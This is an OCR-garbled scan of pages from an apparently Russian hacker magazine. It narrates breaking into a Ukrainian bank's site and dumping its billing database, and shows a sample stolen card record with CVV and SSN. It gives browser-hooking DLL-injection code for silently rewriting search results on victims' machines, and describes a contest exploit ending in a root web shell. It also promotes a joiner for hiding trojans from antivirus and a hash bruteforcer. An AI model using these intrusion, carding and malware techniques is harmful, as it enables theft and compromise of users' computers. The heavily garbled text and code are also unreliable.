//пароль раззѵѵогсі 

// асііоп в форме — вставить название защищаемой скриптины 

Зайдя по адресу ЬіфѴ/ѵѵѵѵѵѵ.заѵеЬапк.сот.иа/кигз 
асітіп.рітр и введя пасс 8уЭ1р646г, я попал в админ- 
ку, в которой предлагалось установить курс валют 
на текущий момент. Тут же мелькнула мысль о том, 
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> Внимание! Все 
действия взломщика 
противозаконны! Ин- 
формация предостав- 
лена исключительно с 
целью ознакомления! 

Ни автор, ни редакция 
за твои действия ответс- 
твенности не несут! 






> На диске ты найдешь 
мойКр-ЬгиІеги рЬр- 
скриптдля выдирания 
логинов из/еіс/раззѵѵсі, 
которые в дальнейшем 
можно использовать для 
б рута. 

«Ь 



>НаОѴБ-диске ты 
найдешь видео по 
взлому сайта Сбербанка 
Украины 
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> Админка банковского сайта 
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> Админка курсов ваяют 



какие последствия повлекло бы за собой 
снижение мной курса доллара в несколько 
раз. Также можно было изменить значение 
курса золота относительно разной мас- 
сы слитка:). К сожалению, возможности 
администрирования на этом ограничива- 
лись. Зато через несколько минут, открыв 
скрипт ІІ5{_тосІиІе.рІ'ір, я получил еще один 
пароль: 

<? 

іТ (зеззіоп_ісІ ()=="») 
зе83Іоп_8іагі(); 

К ($_ЗЕЗЗІОІ\І [фа55ѵѵогЩІІ5ЩтоЦиІеф=Тгие') 

I 

ІД$_Р03Т [ І разз\л/огсІ_ѵаІие І ]!= "зЬапкесІІ1:2005") 

■ 

//пароль раззѵѵогсі 

// асііоп в форме — вставить название защищаемой 
скриптины 

Перейдя по ссылке ИПр://заѵеЬапк.сот.иа/ 
ИМ тосіиіе.рітр . я ввел в формочку ввода 



пасса зЬапкесІі{2005 и опять успешно зало- 
гинился. Наэтотраз мне повезло, это была 
действительно админка банковсого сайта. 
Улыбнувшись, я принялся изучать ее фун- 
кции. В админке позволялось редактиро- 
вать любой из файлов, находящихся в кор- 
не сайта. Окинув взглядом длинный список 
скриптов, я принялся за движок ресурса. 
Как оказалось, с базой движок не работал 
и все данные хранил в файлах с расшире- 
нием іпс (которое я успешно отбросил при 
помощи %00). Тем не менее мне хотелось 
взглянуть на БД сервера, на котором хос- 
тился сайт провайдера «Запорожье Он- 
лайн». Забэкапив движок портала себе на 
винт, я вышел из админки. Погуляв некото- 
рое время по серверу и почитав конфиги 
юзеров, я таки получил рутовый доступ к 
Му50І_. Кроме того, я нашел и бережно ус- 
тановленный админом рИртуасІтіп. Поми- 
мо баз различных форумов и фотоальбо- 
мов, я наткнулся на БД с названием ЬіІІіпд. 
В ней в открытом виде лежали все логины 



и пароли для доступа к биллинг-панели на 
сервере, в том числе и данные банковского 
аккаунта. Я аккуратно слил базу и удалился 
восвояси =). 

□ Мысли вслух 

Свернув окно браузера, я призадумался. 
Получив полный доступ к сайту Сбербанка 
Украины, я в очередной раз убедился, что, 
несмотря на бешеные денежные затраты, 
банки и платежные системы остаются уяз- 
вимыми. Трудно представить, какой ущерб 
можно было нанести, изменив значения 
курсов валют. Благо, банк не предоставлял 
услуги интернет-банкинга, что хоть как-то 
«сберегало» его клиентов. Конечно, я мог 
продать данные банковского аккаунта или 
просто задефейсить сайт, но попасть в мес- 
та не столь отдаленные мне хотелось мень- 
ше всего. Поэтому я незамедлительно на- 
писал сообщение на мыло администрации 
банка о найденных мной уязвимостях и со 
спокойной душой лег спать. НЕ 



ЗАЧЕМ ЛОМАЮТ БАНКИ 



Тебе, наверное, интерес- 
но, что можно поиметь 
со взломанного банка? 
Чтобы лучше это понять, 
давай рассмотрим пример. 
Допустим, хакер ломает 
зарубежный банк. Как 
правило, все забугорные 
банки имеют функцию 
интернет-банкинга, то есть 
управления банковским 
аккаунтом и денежными 
переводами посредством 
Сети. Если умудриться 
слить базу клиентов, то 
можно обеспечить себе 
безбедное существование 
до концажизни (или конец 



жизни в каморке 3x3 =)). 
Обычно информация об 
аккаунтах выглядит следу- 
ющим образом (на примере 
ІІЗА-банков): 

Цодіп: 

Раззѵѵогсі: ***** 

РІГ5І ІЧате: Веі* 

Ьазіпате: Сагго** 

Асісігезз: 5** ЗоиіГі Рагк РІасе 
Сііу: ЕІ Сарп 
Зіаіе: СА| 

Соилігу: ІІпііесІ Шаіез 
2ІР: 92021 
ІІ^гсІТуре: РѳЫ! 

СО ІЧитЬег: 423568001273**** 
Ехрігаііоп МопіГі: 03-2009 



СѴѴ2: 454 
РГіопе: 619-593-9*** 
ттп: саІГюип 
ззп: 45935**** 
сіоЬмтюпіГі: 12 
сІоЬ_сІау: 18 
сІоЬ_уеаг: 1960 

Как видишь, здесь, помимо 
логина/пароля, указа- 
на еще и информация о 
кредитной карте, боЬ, ззп, 
и т. д. Имея на руках такие 
данные, можноуправлять 
денежными средствами 
кардхолдера. Скажулишь, 
что проводить какие-либо 
махинации с российскими 



банками не рекомендуется 
по понятным причинам. 
Тебя все равно найдут, не 
помогут ни прокси, ни впн. 
Деньги всегда оставляют 
засобой шлейф, который 
так или иначе выдасттебя. 
Что касается буржуев, 
то им гораздо сложнее 
достучаться до правосу- 
дия в холодной и голодной 
России. Поэтому есть не- 
сколько способов вывода 
чужих средств. Каких? Об 
этом читай в моих следу- 
ющих статьях, посвящен- 
ных интернет-банкингу и 
кардингу. 
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«гМы увидим игру , которая возьмет 
все лучшее от ІГ Европа 7400, /кльдия" 
добавил огромное количество очень 
многообощою щи* вкусностей#- 

- *И грома ниям, 2006 



долгожданное продолжение 
популярного ИСТО РИКО -экой ОМИЧЕСКОГО симулятора 



ДОооО 



■Нйй Ь^.іо4МсаО Ршйікік*Г'5 ЗЫЬпга Ай Ру+ігаіпЬя 44. Аі№ 4$ Іісмс- Аугііпі. '■ Окр Бзііс-'. ■: Лѵіиол сН Км - ДОміа С^ЬН. СетлНз^Ый ' 6Ы0 
На*ш. Аиііпл. СйѵіУ і-р&і іі.'Ъіл Зітг‘&р(с ѵпІ!* Ин> іиррап: аГ ітч и=~2іД ^'сділт^»! о! Ли Е^гарпп -Іслііг лі.гаі АЛ ЛдМіі гннѵк 

. №5 «СРІі МНаМі'ММѵгі МН *Р|КЙчгіТ1*Ьп«іирні ■ Вм ВДаі язшиичь- 1 &ілі> пртин« |4К|1І'НМ1 М?-1 Ніі . «Й*? 1 . « і« ■*?& пі 

Тмсчичіііір пй,ѵ^ріш інгу 4 ѵ-:тііліі г ^і пй г ь’- * Б1 1 -Е2-БЕ ммН Ъиррэг,. шіюс і- ” я тзгир 4ср^ші- ііз#ті ■ ? г і.:йуі У. 

РЧИГ'ЦЧгігІ т Пуічячнія прадія* И ІІІІТІЗРНИ $рруі,і 






взлом 



» 

к 

ВІ.ОСЮ ВІІ(3(0)В 




НА ПИКЕ СЛАВЫ: 

«ВЗЛОМ» ПОИСКОВЫХ 
СИСТЕМ 

ПОИСКОВЫЕ СИСТЕМЫ - ОСНОВНОЕ СРЕДСТВО ПРОДВИЖЕНИЯ САЙТОВ К ПИКУ СЛАВЫ И МАКСИМАЛЬНОЙ ПОСЕЩАЕМОСТИ. 
ЕСЛИ РЕСУРС СТОИТ НА ПЕРВОМ МЕСТЕ, ТО НАВЕРНЯКА ЭТО ОЧЕНЬ ПОПУЛЯРНЫЙ И РАСКРУЧЕННЫЙ ПОРТАЛ. СЕГОДНЯ МНЕ 
ЗАХОТЕЛОСЬ ПОПАСТЬ НА ПЕРВОЕ МЕСТО. ЗАХОТЕЛОСЬ И ВСЕ ТУТ. ЧТО ДЕЛАТЬ? ЛОМАТЬ ГУГЛ, ПОЛЬЗОВАТЬСЯ СИСТЕМАМИ РАС- 
КРУТКИ? КОНЕЧНО, НЕТ, ВЕДЬ МЫ С ВАМИ ПРИЗВАНЫ РЕШАТЬ ПРОБЛЕМЫ НЕСТАНДАРТНЫМ ПУТЕМ. ИТАК, ПРИШЛО ВРЕМЯ УЗ- 
НАТЬ, КАК СДЕЛАТЬ ТАК, ЧТОБЫ ПРИ ЛЮБОМ ПОИСКОВОМ ЗАПРОСЕ В ПЕРВОЙ СТРОКЕ РЕЗУЛЬТАТОВ КРАСОВАЛСЯ ТВОЙ САЙТ. 



ПРОДВИЖЕНИЕ СВОЕГО САЙТА НА ВЕРХУШКУ ПОИСКОВИКА 



авѳрноѳ, я тебя заинтриговал? 
Ничего сверхъестественного 
мы делать не будем. Конечно, 
можно попрыгать около ком- 
пьютера с бубном, но вряд ли это что-то 
даст:). На самом деле, поместить свой ре- 
сурс на первое место в поисковике не очень 
сложно, в этом нам поможет технология с 
красивым названием «сплайсинг». Она 
заключается в перехвате АРІ функций и 
модификации данных, которые через них 
передаются на сервер или с сервера при- 
нимаются. Ни для кого не секрет, что любое 



приложение общается с внешним миром 
с помощью сокетных функций (не берем 
в расчет исключительные случаи), а конк- 
ретнее — данные передаются с помощью 
функций зепсі и ѴѴЗАЗепсІ, а принимаются 
с помощью гесѵ и ѴѴЗАПесѵ. Почему я здесь 
не рассматриваю исключения или аналоги? 
Потому что все известные браузеры для пе- 
редачи и приема данных в/из сети исполь- 
зуют имен но эти 4 функции. Они находятся в 
библиотеке \а/з2_32.сііі. Есть и одноименные 
названия в библиотеке ѵѵіпзоскеі.сІІІ, но они 
в итоге приходят к своим «родителям» из 



\а/з2_32.сііі, так что, перехватив функции из 
этой библиотеки, мы ничего не упустим. 
Суть перехвата заключается в том, что 
вначале перехватываемой АРІ функции 
делается прыжок на наш код. Очевидно, 
что, когда прыжком с начала перехваты- 
ваемой функции передается управление в 
нашу функцию, в стеке лежат все парамет- 
ры, которые были переданы оригинальной 
функции. То есть мы можем поправить эти 
параметры в соответствии с нашей зада- 
чей и продолжить выполнение программы 
дальше. 
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► Вот та к выглядит примитивная схема вызова АРІ -функции без ее перехвата из программы 



□ В бой! 

В выборе языка я руководствовался широтой аудито- 
рии. Я, конечно, мог выбрать ассемблер и отсечь этим 
90% читателей, которые бы, посмотрев на набор мне- 
мокодов, сказали: «Да, это круто, когда-нибудь и я так 
научусь». Но я хочу донести все и внести ясность, и по- 
этому выбрал ОеІрГіі. Также в самом перехвате я буду 
использовать библиотеку АбѵапсесІ АРІ Ноок ЫЬагу. 
Во-первых, реализовать лучше нужные приемы у нас 
вряд ли получится, а во-вторых, это всего лишь статья, 
и если я буду «засорять» текст довольно громоздкими 
процедурами перехвата, то мне не хватит места для все- 
го остального. 

Чтобы осуществить перехват, мы будем использовать 
внедрение своей ОІ_І_ в адресное пространство друго- 
го процесса (в нашем случае это браузер). С помощью 
библиотеки абѵАріНоок это делается очень просто: 

СгеаІеРгосеззѴѴІІГЮІІ (піі, рСГіаг (раіЩоЦэгоѵѵзег), піі, піі, РАІ_8Е, 

+ 'Ѵпаіп. сНГ)); 



Это, как ты понимаешь, создает процесс, который в сво- 
ем адресном пространстве будет содержать библиотеку 
таіп.бІІ. Чтобы внедрить ЭІ_І_ в уже запущенный процесс 
нужно использовать функцию ІфесЮІІ. Она предельно 
проста, разобраться с ней большого труда не составит, 
но здесь, в экспериментальном режиме, я буду использо- 
вать создание процесса с внедрением ОІ_І_. 

Создадим пустую ОІ_І_ — этакий шаблон, от которого мы 
будем отталкиваться. Именно эта ОІ_І_ будет устанав- 
ливать перехват на функции и содержать в себе код, 
который будет выполняться вместо оригинального при 
перехвате: 



кода главной ОЬЬ'ки 

ргосесіиге ОЫЕпігуРоіпІ: (бѵѵРеазоп: ЭѴѴогсІ); 

1ШІЙ 

сазе бѵѵРеазоп оі 

//Код, который будет выполнен, когда ЭІ_І_ подгрузится к процессу 

ІМІІ 

// Соответственно, код, выполняющийся в процессе осуществлен!/ 
выгрузки рц_ из адресного пространства процессѣ 
ЯН 

к 

Ий 

н 



ІЙЯВіЬ с 

ЭЕЕЕпІгуРоіп1:(ЭІ_І__РРЮСЕЗЗ_АТТАСН); 

епсГ- 

Погично, что при получении процедурой □І_І_ЕпІгуРоіп1: 
сообщения □І_І__РПОСЕЗЗ_АТТАСН нам нужно уста- 
новить перехват на функции. 

НоокРгос ('ѵѵз2_32. сІІГ, 'гесѵ', @І\Ігесѵ, @Тгесѵ); 

НоокРгос ('ѵѵ з2_32. сІІГ, 'зепсі', @№епсІ, @ТзепсІ); 

НоокРгос ('ѵѵз2_32. сІІГ, 'ѴѴЗАРесѵ', @І\ІѴѴЗАПесѵ, @ТѴѴЗАРесѵ); 
НоокРгос ('ѵѵз2_32. сІІГ, 'ѴѴЗАЗепсГ, @І\ІѴѴЗА5епсІ, @ТѴѴЗАЗепсІ); 

Описание параметров дано в комментариях к библио- 
теке абѵАріНоок, его я и приведу: 



кіерехват функции из 011 в текущем процессѣ 

ІрМобиІеІЧате — имя модуля; 

ІрРгосІЧате — имя функции; 



нкции замены; 

ОІсІРгос — здесь будет сохранен адрес моста к старой функции. 



3 с лучае отсутств ия мод уля в тек ущем АП, будет сделана попыткѣ 



Параметр ОІсІРгос должен содержать указатель на 
адрес моста, фактически он определяется в ѵаг как 
прототип перехватываемого кода. Соответственно, 
для четырех перехватываемых функций эти прототи- 
пы будут выглядеть так: 



і, Лад, ТГіЮ: бѵѵогсі; 

Іеп, а, Ь, Ы: бѵѵогсі; 

Ііпк: рСГіаг; 

згЗігіпд: РСГіаг='<асІазз=ІГіге1 : ="Гі1:1:р://ѵѵѵѵѵѵ. хакер. ги/">ХакерОпІіпе- 
&ді;Ноте</а><1аЫесеІІрасІсІіпд=0сеІІзрасіпд=0ЬогсІег=0><іг><ісІ 
сІазз=і><Ьпі зІ2е=-1>Мада2Іпе о! сотриіег Гюоіідапз сбгхЧопІ: 
соІог=#008000>ѵѵѵѵѵѵ.хакер.ги/</1 : оп1:> 1 ; 

Тзепб: Шпсііоп (з: ТЗоскеІ; 

Вик рСГіаг; 

І'еюЦІадз: 

Іпіедег): Іпіедег; зібсаІІ; 



Тгесѵ: ІТіпсІіоп (з: ТЗоскеІ; 
Вик рСГіаг; 

Іеп, ^Іадз: 

Іпіедег): Іпіедег; зібсаІІ; 



АВесѵ: Шпсііоп (з: ТЗоскеі; 
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> На сайте ГіДр://ѵѵазт. 
гц_ты сможешь найти 
много полезных статей 
по перехвату АРІ, в 
частности это замеча- 
тельные статьи автора 
МзНегті. Если хочешь в 
совершенстве овладеть 
этой технологией, обя- 
зательно прочти их. 
ѵѵѵѵѵѵ.дооаіе.ги является 
самой популярной и, 
на мой взгляд, лучшей 
поисковой системой :))). 
ІІзеОоодІе! 




> На нашем диске ты 
найдешь все програм- 
мы, использованные 
в этой статье, а также 
видео-урок. 




> Рассмотренная 
технология может быть 
использована для 
написания незаконного 
ПО, при этом автор 
статьи не несет никакой 
ответственности за твои 
действия. Материал 
дан в ознакомительных 
целях и не противоречит 
УК РФ. 

> Технологии перехвата 
АПИ применяются очень 
широко и помогают в 
решении самых нетри- 
виальных и интересных 
задач. 

Этот пример был 
протестирован на бра- 
узерах Орега 9.01 ЬиіІсІ 
8552 и ІЕ 6.0. 
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> Вызов той же АРІ-функции, но с перехватом методом сплайсинга 



ІрВиЯегз: ЬРѴѴЗАВІІЕ; 
сІѵѵВіЖегСоипІ: ОѴѴОРЮ; 
ѵагІрЫитЬегОШуІезВесѵсІ: ОѴѴОРЮ; 

ШШШШ : РШШШ 

ІрСотрІеііопРіоиііпеЮРѴѴЗАОѴЕРІАРРЕО. 
ШІДІІІМІШШІІИММЕІ ДШИ І 

ТѴѴЗАЗепсІ: Рипсііоп (з: ТЗоскеІ; 

ІрВиЯегз: ЬРѴѴЗАВІІЕ; 
сІѵѵВиТСегСоипІ: ОѴѴОРЮ; 
ѵагІрІ\ІитЬегОЮуІез5епк ОѴѴОРЮ; 

ДИДДЯР 

ІрСот рІеііопРіоиііпеЮРѴѴЗАОѴЕРіЕАРРЕО. 
ІШИЕІЯШШШІЕММІІНЕЙІММЙІШІІ 

Описание прототипов можно взять в заго- 
ловочных файлах Эеіріті. Я думаю, тебе не 
совсем понятно, что собой представляет 
параметр ЫеѵѵРгос, но, на самом деле, все 
просто. Это не что иное, как указатель на 
функции, которые имеют прототипы, ана- 
логичные оригинальным или такие же, как 
и у функций с префиксом «Т». Именно этим 
функциям будет передано управление 
вместо оригинальных, в них мы должны 
будем вызвать оригинальный код, то есть 
выполнить простой перехват без всяких 
вмешательств. 

Щиціівім ІІШ^ШіКІІіДіИі ТШШЯЕ 

ІДпсІіоп Ыгесѵ(з: ТЗоскеІ; Вик рСРіаг; Іеп, кадз: Іпіедег): 
Іпіедег; зісісаіі; 

Врдігі 

Тгесѵ(з, Ьик Іеп, шя 
азт 



ІИИ 

1111 

азгп 

рЬр'ёЙ 

ш 

ВШІ 

ризігасі и рораб используются для того, что- 
бы не было проблем. Для незнающих от- 
мечу, что эти команды процессора кладут 
в стек и восстанавливают оттуда значения 
всех основных регистров. Поэтому лучше, 
чтобы все регистры до и после вызова ори- 
гинальных функций содержали первона- 
чал ьные значения. Любые модификации пе- 
реданных параметров нужно производить в 
пределах двух ассемблерных вставок. 
Грубо говоря, мы установили перехват. Те- 
перь, когда в программе встретился вызов 
одной из этих четырех функций, мы попа- 
даем в функцию с префиксом «І\І». Как вид- 
но, она принимает те же параметры, что и 
перехватываемая. В пределах двух ассем- 
блерных вставок мы делаем с этими пара- 
метрами все, что душе угодно, а далее вы- 
зываем оригинальную функцию (здесь это 
вызов функций с префиксом «Т»), 

Далее, чтобы не повторять много раз один 
и тот же код, стоит сделать следующую 
оговорку. Когда я буду говорить: «В фун- 
кцию перехвата зепсі впишем код...», это 
будет значить, что между строками «епб;» 
и «азт» в функции Ызепб нужно вписать 
какой-либо код. 

Теперь давай исследовать запросы и отве- 
ты гугла при поиске. При перехвате функций 
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отправки данных (зепсі, ѴѴЗАЗепсІ) в полях 
заголовка среди прочих полей существует 
поле «Ассері-Епсобіпд: беЛаіе, дгір, х-дгір, 
ібепМу, *; ц=0», а это значит, что данные от 
сервера будут приниматься в сжатом виде 
и мы не сможем ихпропарсить. Как от этого 
избавиться? Все довольно просто — вмес- 
то «дгір» в полях заголовка нужно вписать 
«попе», таким образом, при ответе серве- 
ра на запрос данные будут приходить в де- 
вственно чистом виде. В функции перехва- 
та зепб пишем следующий код: 

А в функции перехвата ѴѴЗАЗепсІ — такой код: 

ІІ (роз ('Нозі: ѵѵѵѵѵѵ.доодіе.ги', ІрВиГегз. ЬіЛ) > 0) ог (роз 
('Нозі: доодіе.ги', ІрВиГегз. ЬиЦ > 0) іГіеп ВерІасе02ІР 

Чтобы отсечь запросы к другим сайтам 
(ведь нам их обрабатывать вовсе не нуж- 
но), я ввожу проверку наличия строк «Нозі: 
ѵѵѵѵѵѵ.доодіе.ги» и «Нозі: доодіе.ги». Функция 
ВерІасе02ІР — это самописная функция, 
которая ищет строку « д 2 і р » и заменяет ее 
строчкой «попе»: 

Іипсйоп ВерІасе02ІР (ІрОаІа: роіпіег; згЮаіа: сіѵѵогсі): 

ІІМШІ; 

ИН 

Ъгі: =320а1а сіоѵѵпіо 0 сіо 
ІёдіД 

іі сіѵѵогсі (ІрйаіаЩ = $70697А67 іГіеп сіѵѵогсі (ІрОаІа л ):= 

ІШЯШЕ; 

■ 

Воттеперь ответ сервера мы можем спокойно 
парсить, как любые данные НітІ-формата. 
Сделай в поисковике запрос по слову 
«журнал» и открой біті-код страницы. 
Приглядевшись, ты сможешь четко уви- 
деть структуру отображения результатов 
поиска, которые условно можно разбить на 
блоки, например, самый первый блокбудет 
следующим: 

Ш1ШИ1МШ|Цр:/ИИ1^ВШ.г.иМИШ1ШШН1 

ти — женский <Ь>журнал</Ьх/ахІаЬІесеІІрасІсІіпд=0 
се11зрасіпд=0 ЬогсІег=ОхІгхІсІ сІаззЧхЬпІ зІ 2 е=- 
1>Рукоделие, гороскоп, конкурсы, обратная связь и 
многое другое. сЬгхЬпІ: соІог=#008000>ѵѵѵѵѵѵ.раззіоп. 

Я — им— щ 
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Картинки Г руппь Каталог Дд палите льна & 

СООЙІе Пои ' 

О * Поиск & Интернете Поиск страниц на русской 



Веб 

Совет. Время -деньги! Нажимайте “Ввод' (Епіег) не клавиатуре вместо кнопки "Поиск" і 

Хакер Опііпе -* Ноте 

Мадагте оі соплриіег гюоІісеп& 

^^.какзр.ш/ Со іс р^ц о в н д ще - ПйИРИР стракиц и 
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> А вот результат работы которая была внедрена в процесс браузера 



Чтобы подставить вместо этого сайта наш 
собственный, мы должны найти позицию 
первой строки «<а сІазз=І Иге{=» в ответе 
сервера, далее, начиная с этой позиции, 
найти позицию строки «</Топ1>», прибавить 
к этой позиции длину этого тега, то есть 
«6», и весь текст, который находится между 
этими двумя позициями, заменить нашим. 
В качестве примера я подставлю на первое 
место сайтжурнала «Хакер», итогда строка, 
которой мы будем заменять, приобретает 
следующий вид: 

<а сІазз=І Гіге^=“ГіНр://ѵѵѵѵѵѵ.хакер.ги/">Хакер Опііпе 

ЬогсІег=0х1гх1:сІ сІазз=і><Ьпі зІ2е=-1>Мада2Іпе о! 
сотріііег Ьооіідапз <Ьгх!опі соіог=#008000>ѵѵѵѵѵѵ. 
хакер. ги/<Доп!> 



('<асІазз=І ГігеІ=', ІрОаіа); 
ІТ а=0 ІИеп ехД; 

Іеп: =0; 



ШШіі 

Вд:=Ш 



ОеіМет (Ііпк, згОаіа); 



МоѵеМетогу (Ііпк, ІрОаіа, а); 
(з25і:гіпіИ 



Іеп:=а+ІепдіІі (згЗігіпд); 
Ь:=320аіа-ІпЗіг (а, ІрОаіа, '</ЬпЬ'); 



МоѵеМетогу (роіпіег (сіѵѵогсі (Ііпк)+Іеп), роіпіег (сіѵѵогсі 



рйаіа, Ііпк, згОаіа); 



Теперь в функцию перехвата гесѵ пишем та- 
кой код: 

НЯИИДД 

А в функцию перехвата ѴѴЗАВесѵ — такой: 

ІІ роз ('доодіе', ІрВиіТегз. ЬиЦ > 0 ІГіеп НерІасеНезиІІ 
(ІрВиЛегз. ЬіД ІрВиТТегз. Іеп); 

Как ты уже догадался, вся работа по заме- 
не результатов поиска будет происходить 
в функции ВерІасеВезиІТ которая прини- 
мает два параметра: указатель на данные 
(в нашем случае это указатель на данные, 
которые прислал сервер) и длину этих дан- 
ных. Я приведу полный листинг функции 
ВерІасеВезиІІ, а после прокомментирую 
каждую строку: 

Іипсііоп ВерІасеНезиІІ (ІрОаІа: рСІіаг; згйаіа: сіѵѵогсі): 




8ИШИШУУУМІІ 



ТГіЮ:=Сгеа1:еТГігеасІ (піі, 128*1 024, @ТГігеасІРгос, піі,0, 

тш 

СІозеНапсІІе(ТІпЮ), 

т 

1. Мы вводим переменную Лад, которая 
будет устанавливаться в случае, если эта 
страница — действительно ответ от гугла 
на поисковую фразу. Переменная Лад бу- 
дет обнуляться каждые 6 секунд. Если в 
течение шести секунд человек сделает 2 
или более поисковых запроса, то во вто- 
рой и последующие разы наша функция 
РерІасеРезиІі просто завершится в самом 
начале. Сделано это для того, чтобы избе- 
жать некоторых проблем. Этот интервал 
можно уменьшить, но тогда мы рискуем 
уронить браузер. 

2. В данных, которые пришли от сервера, 
ищем строку «<а сІазз=І Иге!=». Если тако- 
вой нет, то делаем вывод, что эти данные не 
являются ответом на поисковый запрос, и 
выходим. 

3. В выделенный участок памяти копируем 
все данные до позиции а. 



МоѵеМетогу (Ііпк, Ірйаіа, а); 

4. Начиная с позиции а, в выделенный учас- 
ток памяти записываем строку згЗігіпд. Ее 
значение можешь посмотреть выше, она 
объявлена в секции ѵаг. 

МоѵеМетогу (роіпіег (сіѵѵогсі (Ііпк)+а), згЗігіпд, ІепдЛп 

5. Первая строка, я думаю, всем понятна, а 
вот во второй непонятным является вызов 
функции ІпЗіг. Это самописная функция, 
ее реализацию ты можешь посмотреть в 
исходниках на нашем ЭѴЭ. Она аналогич- 
на стандартной процедуре роз, но первым 
параметром принимает позицию, с которой 
будет начинать поиск субстроки «<ЛопІ>» в 
строке ІрЭаіа. 

6. Сложно объяснить, что будет делать сле- 
дующая строка:), ниже я приведу схему ра- 
боты, на ней будет виден этот момент. 



сіѵѵогсі (Ііпк)+Іеп), роіпіег (сіѵѵогсі 



(ІрОаІа)+ІпЗіг(а, Ірйаіа, '</ІопІ>')+6), Ь); 



7. Результат наших действий записываем 
по адресу ІрЭаІа, то есть по адресу, где хра- 
нятсяданные, принятыеотсервера. Именно 
с этого адреса браузер начнет их парсинг и 
отображение. 



8. Помнишь, я говорил, что каждые 6 се- 
кунд переменная Лад будет обнуляться? 
Так вот это будет происходить в функции 
ТІтгеасІРгос, ее код приведен ниже. 

ТГіЮ:=Сгеа1еТГігеасІ (піі, 128*1 024, @ТГігеасІРгос, піІД 

■па 

1ШН:|ШШШ|ІІ[|І 

Я думаю, тебе будет легче, если я схематично 
изображу работу, которую производит код с 
третьего по шестой пункты включительно. 

О В добрый путь! 

Хотелось бы отметить, что подобную тех- 
нологию можно задействовать в любом 
другом поисковике и, в принципе, в любом 
месте, где нужно заменить контент сайта. 
Отличие будетлишь в процедуре парсинга 
результатов. Теперь все карты в твоих ру- 
ках — можешь смело засылать программу 
будущим клиентам и ждать отдачи от твоего 
«суперраскрученного» ресурса:). И-И 
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> Видео прохождения 
конкурса ищи на ОѴй 



х-конкурс 

ѴАіМі пришло время рассказать тебе о том, какпрошел предыдущий конкурс. Первым делом надо было научиться менять номер ком- 
наты на любой другой. Для этого в регистрации вместо короткого нужно было ввести большущий пароль — такой, чтобы он перекрыл 
собой переменную с номером комнаты. Менять номер комнаты как захочешь — это, конечно, великое счастье, но если менять его с 
умом, то этого счастья будет еще раз в 10 больше. А с умом надо было тупо перебирать номера, выходящие за границы списка. При 
этом нарушались границы соответствующего массива, и в информации пользователя мы видели следующие за массивом строки. 
Как назло для бота, там были логин и пароль админа. Счастливчики, дошедшие до этого момента, получили привилегии смены адреса 
комнат. Как помнишь, коды скрипта, соответствующего комнате, были выложены для всеобщего обозрения и несли на своем борту 
банальную рбр-іфесіі оп. Но вот незадача — чтобы совершить рбр-іпіесііоп, нужно было каким-то образом послать правильно сфор- 
мированный розі-запрос. Но и это было решабельно. Просто надо было учесть, что адрес комнаты вставляется непосредственно в 
Нир-запрос и можно сформировать этот адрес так, что он заменит всю оставшуюся часть пакета и выставит нужные розі-параметры. 
Воттак вот и появилась возможность выполнить произвольный рбр-скрипти при желании получить ѵѵеЬ-зІлеІІ , который, кстати, был с 
правами рута. 

Победителем конкурса стал ЗрІОіТ. Он получает приз — подписку на наш журнал. ЗЕ 
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Во Власти Качества 

Монитор высокой четкости 

Жидкокристаллический монитор І_6 ПАТНОЙ ІЛ970НН 

Высокий уровень контрастности - 2000:1/ Малое время отклика матрицы - 2 мс 
Диагональ - 197 Разрешение 1280x1024/ 16,2 млн. цветов/ 

Углы обзора - Н/Ѵ 1607 ѴЕ8А крепление/ Соответствие стандартам - ТСС 03 



информационная служба Еіееігоя іс& 8-800-200-7676 (бесплатная горячая линия па России) 
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▼ ПРОГРАММА: 
ОС: 

АВТОР: 




> Склеиваем два файла 

Думаю, что такое боіпег, тебе объяснять не 
нужно. Это программа, предназначенная 
для склейки нескольких файлов в один. 
Зачем она нужна? Представь такую ситуа- 
цию: тебе необходимо незаметно пронести 
какую-либо информацию на сменном но- 
сителе, но руководство учреждения строго 
контролирует все вносимые/выносимые 
данные. Как быть? Вот тут тебе на помощь 
и придет ЭЗ боіпег. Ты просто берешь лю- 
бой документ, не вызывающий подозрений 
(отчет в ворде/фотка/еіс), и «склеиваешь» 
его с нужным тебе файлом (архив с инфор- 
мацией/приложение/еіс). Операция пре- 
дельно проста и затруднений вызвать не 
должна. Также аналогичным образом ты 
можешь без труда протроянить пользова- 
теля, подсунув ему вполне рабочую прогу, 
склеенную с трояном. Вот такие пироги. 
Кроме того, созданные ЭЗ боіпег'ом файлы 
не палятся антивирусами, что несомненно 
является огромным плюсом тулзы. Написа- 
ли утилу ребята из НеІІ КпідНІз Сгеѵѵ, за что 
им большой респект. Эта команда уже дав- 
но радует своими релизами, пожелаем им 
и дальнейших успехов =). В архиве на ЭѴЭ, 
помимо самой тулзы, также лежат исходни- 
ки джойнера. 
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ПРОГРАММА: 

ПЕСОѴЕНУ 

ОС: 

АВТОР: 



- Асіѵітс 


есі МсІІ рссоѵсгу Ьу ѲііЬ(9 


Н-а*Ь: [і 
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>Скоростноі 


л тб5-брутер 



Наверняка тебе не раз приходилось брутить 
ІПСІ5-ХЭШИ. Данный алгоритм пользуется 
огромной популярностью среди разра- 
ботчиков различных веб-систем. Поэтому, 
слив очередную базу с крупного ресурса, 
приходится запускать брут админского 
хэша, чтобы заполучить заветный пасс. 
В такой ситуации необходимо иметь на- 
дежный инструмент для повседневной ра- 
боты. Конечно, ты можешь кивнуть в сторону 
РаззѵѵогбзРго и аналогичных софтин, но за- 
частую они не подходят для эксплуатации в 
силу ряда причин (высокая загрузка процес- 
сора, низкая скорость работы и т.д.). Одна- 
ко альтернатива есть, и имя ей — АбѵапсесІ 
МЭ5 Яесоѵегу. Однажды меня попросили 
сбрутить мд5-хэш, предложив взамен не- 
большой гонорар. Отказывать знакомым не 
хотелось, и я согласился. Но под рукой на 
тот момент был лишь ломанный виндовый 
дедик, напичканный старым железом. За- 
пускать там РаззѵѵогсІзРго было бы смешно, 
а использовать свой рбр-скрипт оказалось 
невозможным по причине отсутствия рбр- 
интерпретатора. Недолго думая, я стукнул 
своему старому товарищу и поинтересо- 
вался наличием у него подходящего бруте- 



ра. Он мне посоветовал воспользоваться 
АбѵапсесІ ІѴЮ5 Яесоѵегу. Залив софтинку на 
дедик, я запустил ее, указав хэш и загрузив 
словарик. К моему удивлению, результат не 
заставил себя долго ждать, и в скором вре- 
мени я довольствовался паролем. 

Эта история призвана обратить твое внима- 
ние именно на эту прогу. Тулза предназначе- 
на для брута тб5-хэшей и со своей задачей 
справляется просто превосходно. Брутер 
написан на ассемблере и отличается очень 
высокой скоростью работы. Правда, на дан- 
